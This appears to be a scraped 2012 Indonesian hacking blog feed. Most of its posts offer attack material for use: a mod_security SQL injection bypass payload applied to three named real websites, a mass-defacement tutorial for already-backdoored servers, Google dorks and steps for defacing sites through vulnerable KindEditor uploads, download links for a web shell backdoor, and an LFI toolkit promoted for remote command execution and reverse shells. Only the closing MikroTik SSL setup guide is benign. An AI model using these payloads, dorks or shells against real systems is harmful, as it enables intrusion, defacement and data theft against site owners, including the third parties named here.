A Little Piece of n00b

[SHELL] Exidous WebShell

[SHELL] Exidous WebShell

Hasil modifikasi dr b374k shell modified by: Exidous Enjoy.!! download …

26 Apr 2012

mod_security 2.6.5 for Apache 2.2.x & 2.4.1 Released SQL injection bypass

<pre># Exploit Title: mod_security 2.6.5 SQL injection bypass
# Date: 21/04/2012
# Author: Phizo
# Greetz: Inj3ct0r Exploit DataBase 1337day.com
# Software Link: http://www.modsecurity.org/
# Version: 2.6.5
# Tested on: Windows 7 & Ubuntu 10.04
----------------------------------------------------------------

/** Although I am using union-based injection the concept of the bypass is the same **/

[+] Bypass: +/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/#

[+] PoC: http://victim/page.php?id=12+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/#

[+] Example sites:
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.indiacctv.com/product.php?id=-18+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,0x5068697a6f,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/#
http://www.outside-music.com/news.php?id=-1+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,4,0x5068697a6f,(/*!table_name*/),7,8,9,10,11,12,13+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/#
http://www.atitelemetry.com/viewapp.php?id=7'+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,0x5068697a6f,/*!table_name*/,4,5,6,7+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/--+
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# <a href="http://1337day.com/">1337day.com</a> [2012-04-22]</pre>

mod_security 2.6.5 for Apache 2.2.x & 2.4.1 Released SQL injection bypass

# Exploit Title: mod_security 2.6.5 SQL injection bypass # Date: 21/04/2012 # Author: Phizo # Greetz: Inj3ct0r Exploit DataBase 1337day.com # Software Link: http://www.modsecurity.org/ # Version: 2.6.…

22 Apr 2012

[Tutorial][Video]Deface All Extension File in Website

Tutorial ini saya namakan Deface All Extension File in Website 
 
Kenapa saya menamakan dengan nama tersebut? 
Ya karena di tutorial ini semua file yang berekstensi .php, .html, .htm, .asp, .aspx, .js, .ac akan terganti isinya (Deface) 
 
Mungkin segitu saja intermezzonya dan mari kita bahas caranya 
 
Tutorial Cara Mendeface Semua Ekstensi di dalam Website 
 
1.Siapkan Target anda yang sudah anda tanam Backdoor/Shell 
2.Silahkan upload file perl untuk Mendeface Semua Ekstensi di dalam Website [File ada di bawah Tutorial] 
3.Setelah file perl sudah terupload , maka kita jalankan file perl tersebut dengan perintah 
<blockquote><cite>Quote:</cite>perl [nama file perl anda.pl]</blockquote>Contoh 
<blockquote><cite>Quote:</cite> perl mass.pl</blockquote>4.Setelah file perl dijalankan , mari kita refresh shell kita atau kita buka websiter tersebut 
5.Jika Shell kita atau website tersebut sudah terganti isinya maka kita sudah berhasil Mendeface Semua Ekstensi di dalam Website 
 
Jika kakak-kakak masih bingung bisa melihat video Tutorialnya 
<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="allowfullscreen" frameborder="0" height="266" mozallowfullscreen="mozallowfullscreen" src="https://www.youtube.com/embed/H7_GfEidz4Q?feature=player_embedded" webkitallowfullscreen="webkitallowfullscreen" width="320"></iframe></div> 
Untuk mendownload file perlnya bisa di download disini 
<blockquote class="tr_bq"><a href="http://www.mediafire.com/?avt7yncyp44s8z8" target="_blank">http://www.mediafire.com/?avt7yncyp44s8z8</a></blockquote>Salam HNC

[Tutorial][Video]Deface All Extension File in Website

Tutorial ini saya namakan Deface All Extension File in Website Kenapa saya menamakan dengan nama tersebut? Ya karena di tutorial ini semua file yang berekstensi .php, .html, .htm, .asp, .aspx, .js, .a…

02 Apr 2012

Tutorial Deface Web KindEditor

ok...langsung saja...<img alt="Marah" border="0" src="http://hacker-newbie.org/images/kucink/marah.gif" style="vertical-align: middle;" title="Marah" /> 
Dork: 
<blockquote class="tr_bq"><div class="codeblock"> <div class="title">Code: 
</div><div class="body" dir="ltr"><code>inurl:examples/uploadbutton.html 
inurl:kindeditor 
gunakan Pikiran seorang HACKER untuk mendapatkan korban yg lebih banyak...</code></div></div></blockquote>exploit: 
 
<blockquote class="tr_bq"><div class="codeblock"> <div class="title">Code: 
</div><div class="body" dir="ltr"><code>http://www.contoh.com/path/kindeditor/examples/uploadbutton.html</code></div></div></blockquote>Step 1: Klik Upload 
<div class="separator" style="clear: both; text-align: center;"><a href="http://pictat.com/i/2012/2/20/4335501.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="118" src="http://pictat.com/i/2012/2/20/4335501.jpg" width="320" /></a></div> 
 Step 2: Pilih HTML DEPESAN agan... 
Contoh disini menggunakan HTML ane... catalyst71.html<img alt="Culas" border="0" src="http://hacker-newbie.org/images/kucink/culas.gif" style="vertical-align: middle;" title="Culas" /> 
<div class="separator" style="clear: both; text-align: center;"><a href="http://pictat.com/i/2012/2/20/1773102.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://pictat.com/i/2012/2/20/1773102.jpg" /></a></div>step 3: 
Nanti akan keluar URL hasil upload-an HTML kita...copas link tsbt letakkan diakhir URL 
<div class="separator" style="clear: both; text-align: center;"><a href="http://pictat.com/i/2012/2/20/3216203.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="132" src="http://pictat.com/i/2012/2/20/3216203.jpg" width="320" /></a></div> 
Step 4: 
kemudian tekan ENTER dan... 
TARA... <img alt="Cheer" border="0" src="http://hacker-newbie.org/images/kucink/cheer.gif" style="vertical-align: middle;" title="Cheer" /> <img alt="Cheer" border="0" src="http://hacker-newbie.org/images/kucink/cheer.gif" style="vertical-align: middle;" title="Cheer" /> 
<div class="separator" style="clear: both; text-align: center;"><a href="http://pictat.com/i/2012/2/20/2749904.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://pictat.com/i/2012/2/20/2749904.jpg" width="320" /></a></div>HNC

Tutorial Deface Web KindEditor

ok...langsung saja... Dork: Code: inurl:examples/uploadbutton.html inurl:kindeditor gunakan Pikiran seorang HACKER untuk mendapatkan korban yg lebih banyak...exploit: Code: http://www.contoh.com/pat…

02 Apr 2012

Shell Dewa :D

Anak buah si b374k <img alt="seneng" border="0" src="http://devilzc0de.org/forum/images/smilies/penjahat.gif" style="vertical-align: middle;" title="seneng" /> 
<ol><li>devshell.php</li>
<li> devshell.cgi</li>
<li> devshell.asp</li>
<li> devshell.aspx</li>
<li> devshell.jsp</li>
</ol>Kurang lebih isi.x sama dengan b374k, yg beda cuma dalem.x <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> 
<div class="separator" style="clear: both; text-align: center;"><a href="http://img29.imageshack.us/img29/333/devshell.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="159" src="http://img29.imageshack.us/img29/333/devshell.jpg" width="320" /></a></div>pake password om 
<div class="separator" style="clear: both; text-align: center;"><a href="http://img204.imageshack.us/img204/6714/devshelllog.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="77" src="http://img204.imageshack.us/img204/6714/devshelllog.jpg" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://devilzc0de.org/forum/images/smilies/pinter.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"> 
</a></div>monggo digunakan  om 
dwnload <a href="http://packetstormsecurity.org/files/90783/Devshell-Backdoor.html" target="_blank">disini</a><a href="http://packetstormsecurity.org/files/90783/Devshell-Backdoor.html" target="_blank"></a> 
miror 
<a href="http://formatnews.com/devshell.zip" target="_blank">http://formatnews.com/devshell.zip</a> 
didalemnya ada sourcenya juga.. 
jadi bisa buat belajar/dimodifikasi sendiri yah kak.. 
100% bersih no hidden backdoor 
hehehe ak dan om b374k ga doyan nyolong shell kak.. 
klo mau bisa nyari sendiri kan... hihihihi 
<a href="http://devilzc0de.org/forum/images/smilies/pinter.gif" style="margin-left: 1em; margin-right: 1em;"><img alt="pinter" border="0" src="http://devilzc0de.org/forum/images/smilies/pinter.gif" style="vertical-align: middle;" title="pinter" /></a> 
 
 
untuk modifikasi... 
variable ini bisa kamu modif... 
- shell_name <-- ini nama shell... lebi baik pake nama devilzShell aja . 
- shell_fake_name <-- ini ntar yg nongol di halaman login shell 
- shell_title <-- ini title nya kak... bisa digaul2in pake nama kk.. 
- shell_password <-- passwordnya 
- shell_fav_port <-- tiap orang punya port favorit :-p 
- shell_color <-- nah ini yg paling asoy... bisa rubah warna warni shell nya sesuai keinginan kk.. 
untuk warna kk bisa <a href="http://www.colorschemer.com/online.html" target="_blank">kesini</a> 
 
special note untuk devshell.cgi 
pertama kk harus tau dimana perl binary berada... 
defaultnya ada di /usr/bin/perl 
nah klo misalnya dia ada di /usr/local/bin/perl 
kk rubah yg di devshell.cgi dipaling atas 
<blockquote class="tr_bq"><div class="title">PHP Code: 
</div><code>#!/usr/bin/perl </code></blockquote>jadi 
<blockquote class="tr_bq"><div class="title">PHP Code: 
</div><code>#!/usr/local/bin/perl </code></blockquote>ato misalnya di c:\perl\perl.exe 
rubah jadi 
<blockquote class="tr_bq"><div class="title">PHP Code: 
</div><code>#!"c:\perl\perl.exe" </code></blockquote>jgn lupa cgi-nya harus punya execute permission (chmod +x) 
biasanya sih klo cgi dipake kl d dpet shell php... 
buat bypass safemode / base dir restriction dll... 
 
Credit: om <a href="http://devilzc0de.org/forum/300" style="color: red;" target="_blank">ketek </a>

Shell Dewa :D

Anak buah si b374k devshell.php devshell.cgi devshell.asp devshell.aspx devshell.jsp Kurang lebih isi.x sama dengan b374k, yg beda cuma dalem.x pake password om monggo digunakan om dwnload disi…

02 Apr 2012

r00t 4 Lfi tOolKit v0.2 REL

Author: KedAns-Dz 
 
Hi Br0ther5 ... 
 
a Develop sOmE 0ld t00l To Exploiting some LFI vulnerabilites 4 ExEc remote Commands 
this t00lkit make just 4 help U's When Attacking some servEr and discover/Find that Vlnarable 
LFI in some sites t0 Exec CMD or Upload Shell / 0r Spawn Back Reverse TCP 
 
Like And Use And Inj0Y br0thers 
<div class="separator" style="clear: both; text-align: center;"><a href="http://sourceforge.net/projects/r00t4lfi/screenshots/hometest.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="118" src="http://sourceforge.net/projects/r00t4lfi/screenshots/hometest.PNG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://sourceforge.net/projects/r00t4lfi/screenshots/r4lvex.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="http://sourceforge.net/projects/r00t4lfi/screenshots/r4lvex.PNG" width="320" /></a></div> 4 Download > <a href="http://sourceforge.net/projects/r00t4lfi/" target="_blank">http://sourceforge.net/projects/r00t4lfi/</a> 
 
// KedAns-Dz

r00t 4 Lfi tOolKit v0.2 REL

Author: KedAns-Dz Hi Br0ther5 ... a Develop sOmE 0ld t00l To Exploiting some LFI vulnerabilites 4 ExEc remote Commands this t00lkit make just 4 help U's When Attacking some servEr and discover/Find th…

02 Apr 2012

Kumpulan Bot Scanner on IRC

Kumpulan Bot Scanner on IRC

This summary is not available. Please click here to view the post.…

02 Apr 2012

Testing Image collection files upload vulnrablity

Testing Image collection files upload vulnrablity

Dorks : inurl:"modules/filemanagermodule/actions/?picker.php??id=0" intitle:"Testing Image Collections" Goto Google or Bing and Type Dork inurl:"modules/filemanagermodule/actions/?picker.php??id=0" or…

02 Apr 2012

Membuat login hotspot mikrotik dengan SSL agar lebih aman

Sabagai salah satu tahapan finishing setup mikrotik, maka diperlukan koneksi tersandi ke hotspot mikrotik. 
 
Ini sangat penting karena dengan integrasi otentifikasi mikrotik dengan radius dan LDAP yang hanya bisa PAP (tidak bisa CHAP). 
 
Tahapan yang dilakukan yaitu : 
 
A. Membuat sertifikat SSL di OS Linux 
 
Untuk dapat membuat sertifikat diperlukan aplikasi openSSL, maka apabila di OS Linux belum ada diperlukan instalasi openSSL. 
 
1. membuat key 
<blockquote class="tr_bq"># openssl genrsa -des3 -out hotspot.key 1024 
 
Generating RSA private key, 1024 bit long modulus 
……………….++++++ 
……++++++ 
e is 65537 (0×10001) 
Enter pass phrase for hotspot.key: <password> 
Verifying - Enter pass phrase for hotspot.key: <ulangi password></blockquote>–> akan dibuat file hotspot.key 
 
2. Membuat request key 
 
# openssl req -new -key hotspot.key -out hotspot.csr 
<blockquote class="tr_bq">Enter pass phrase for hotspot.key: 
    You are about to be asked to enter information that will be incorporated 
    into your certificate request. 
    What you are about to enter is what is called a Distinguished Name or a DN. 
    There are quite a few fields but you can leave some blank 
    For some fields there will be a default value, 
    If you enter ‘.’, the field will be left blank. 
    —– 
    Country Name (2 letter code) [GB]:ID 
    State or Province Name (full name) [Berkshire]:DIY 
    Locality Name (eg, city) [Newbury]:Yogyakarta 
    Organization Name (eg, company) [My Company Ltd]:UII 
    Organizational Unit Name (eg, section) []:. 
    Common Name (eg, your name or your server’s hostname) []:uiiaccess.uii.ac.id 
    Email Address []:kusprayitna@staff.uii.ac.id 
 
    Please enter the following ‘extra’ attributes 
    to be sent with your certificate request 
    A challenge password []:<password> 
    An optional company name []:Badan Sistem Informasi</blockquote>–> akan dibuat file hotspot.csr berdasar hotspot.key 
 
3. Membuat certifikat sendiri 
 
# openssl x509 -req -days 10000 -in hotspot.csr -signkey hotspot.key -out hotspot.crt 
Signature ok 
subject=/C=ID/ST=DIY/L=Yogyakarta/O=UII/CN=uiiaccess.uii.ac.id/emailAddress=kusprayitna@staff.uii.ac.id 
Getting Private key 
<blockquote class="tr_bq">Enter pass phrase for hotspot.key: <password></blockquote>–> akan dibuat file sertifikat ssl hotspot.crt berdasar point 1 dan 2 
 
4. Upload file hotspot.key dan hotspot.crt ke server router mikrotik dengan menggunakan FTP 
 
B. Instalasi sertifikat di mikrotik 
 
1. Masuk ke terminal mikrotik dan import sertifikat : 
/certificate import file-name=hotspot.crt 
    passphrase: <password> 
    certificates-imported: 1 
    private-keys-imported: 0 
    files-imported: 1 
    decryption-failures: 0 
    keys-with-no-certificate: 0 
 
    /certificate import file-name=hotspot.key 
    passphrase: <password> 
    certificates-imported: 0 
    private-keys-imported: 1 
    files-imported: 1 
    decryption-failures: 0 
<blockquote class="tr_bq">    keys-with-no-certificate: 0</blockquote>2. Lihat hasil import 
/certificate print 
    Flags: K - decrypted-private-key, Q - private-key, R - rsa, D - dsa 
 
    0 KR name=”cert1″ subject=C=ID,ST=DIY,L=Yogyakarta,O=UII,CN=uiiaccess.uii.ac.id 
    , 
    emailAddress=kusprayitna@staff.uii.ac.id 
    issuer=C=ID,ST=DIY,L=Yogyakarta,O=UII,CN=uiiaccess.uii.ac.id, 
    emailAddress=kusprayitna@staff.uii.ac.id 
    serial-number=”C085DEEAA752A0EF” email=kusprayitna@staff.uii.ac.id 
    invalid-before=mar/09/2010 18:07:36 invalid-after=jul/25/2037 18:07:36 
<blockquote class="tr_bq">    ca=yes</blockquote>7. Set koneksi www-ssl dengan sertifikat cert1 yang barusan di import 
<blockquote class="tr_bq">/ip service set www-ssl certificate=cert1</blockquote>8. Jika masih disable www=ssl maka aktifkan 
<blockquote class="tr_bq">/ip service set www-ssl disabled=no</blockquote> 
<a href="http://www.blogger.com/">Sumber</a>

Membuat login hotspot mikrotik dengan SSL agar lebih aman

Sabagai salah satu tahapan finishing setup mikrotik, maka diperlukan koneksi tersandi ke hotspot mikrotik. Ini sangat penting karena dengan integrasi otentifikasi mikrotik dengan radius dan LDAP yang …

02 Apr 2012

Load more posts